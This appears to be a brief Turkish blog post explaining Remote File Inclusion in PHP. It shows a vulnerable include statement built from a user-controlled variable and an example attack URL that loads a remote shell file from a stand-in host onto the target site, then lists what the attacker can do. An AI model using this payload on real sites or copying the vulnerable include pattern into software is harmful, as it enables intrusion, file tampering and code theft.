RFI (Remote File İnclusion)

RFI (Remote File İnclusion) örneği verelim;

include(“$hakkimda/yeni/haber.php”);

Hatamız bu satırdaki "$" parametresinden doğmaktadır. Bu sayede uzaktan dosya çağırmam mümkün oluyor.

http://www.hedefsite.com/index.php?hakkimda=http://shelladres.com/shell.txt?

 Yukarıdaki kodda olduğu gibi "shell.txt?" adresinde bulunan shell (zararlı kod) hedefsite.com üzerinde çalışmaktadır. Sanki o shell o sitedeymiş gibi çalışma sağlamaktadır. Bu sayede sitenin bize vermiş olduğu izinler doğrultusunda siteye istediğimiz dosyayı sokabilir (upload edebilir), istediğimiz dosyanın içeriğini kodlarını vb görebilir ve isimlerini değiştirebiliriz.

1 yorum: